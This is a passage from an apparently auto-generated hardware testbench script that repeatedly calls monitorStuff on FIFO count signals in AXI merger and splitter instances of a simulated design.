counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge8.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge8.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge8.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge8.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge8.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge8.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge8.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge8.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge8.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge8.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge8.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge8.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge8.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge8.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge8.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge8.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge8.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge8.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge8.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge8.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.panic_dcount")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge8.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge9.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge9.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge9.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge9.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge9.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge9.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge9.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge9.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge9.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge9.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge9.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge9.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge9.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.panic_dcount")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge9.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.split0.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split0.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split0.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split0.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split0.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split0.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split0.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split0.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split0.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split0.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split0.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split0.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split0.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split0.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split0.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split0.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split0.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split0.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split0.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split0.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split0.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split0.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split0.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split0.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split1.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split1.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split1.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split1.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split1.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split1.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split1.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split1.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split1.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split1.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split1.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split1.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split1.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split1.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split1.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split1.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split1.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split1.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split1.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split1.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split1.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split1.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split1.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split1.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split10.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split10.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split10.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split10.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split10.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split10.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split10.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split10.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split10.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split10.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split10.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split10.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split10.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split10.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split10.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split10.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split10.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split10.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split10.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split10.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split10.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split10.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split10.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split10.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split100.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split100.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split100.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split100.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split100.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split100.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split100.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split100.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split100.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split100.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split100.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split100.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split100.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split100.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split100.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split100.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split100.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split100.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split100.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split100.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split100.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split100.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split100.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split100.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split101.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split101.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split101.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split101.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split101.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split101.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split101.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split101.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split101.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split101.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split101.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split101.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split101.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split101.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split101.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split101.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split101.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split101.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split101.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split101.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split101.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split101.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split101.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split101.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split102.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split102.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split102.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split102.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split102.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split102.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split102.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split102.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split102.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split102.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split102.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split102.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split102.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split102.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split102.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split102.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split102.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split102.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split102.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split102.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split102.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split102.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split102.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split102.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split103.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split103.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split103.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split103.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split103.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split103.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split103.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split103.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split103.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split103.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split103.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split103.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split103.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split103.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split103.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split103.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split103.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split103.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split103.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split103.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split103.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split103.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split103.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split103.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split104.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split104.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split104.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split104.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split104.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split104.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split104.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split104.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split104.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split104.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split104.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split104.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split104.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split104.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split104.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split104.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split104.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split104.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split104.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split104.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split104.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split104.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split104.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split104.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split105.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split105.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split105.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split105.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split105.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split105.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split105.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split105.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split105.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split105.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split105.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split105.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split105.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split105.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split105.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split105.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split105.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split105.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split105.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split105.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split105.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split105.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split105.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split105.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split106.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split106.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split106.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split106.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split106.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split106.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split106.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split106.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split106.axi_wr_4_splitter.aw_fifo.next_count")
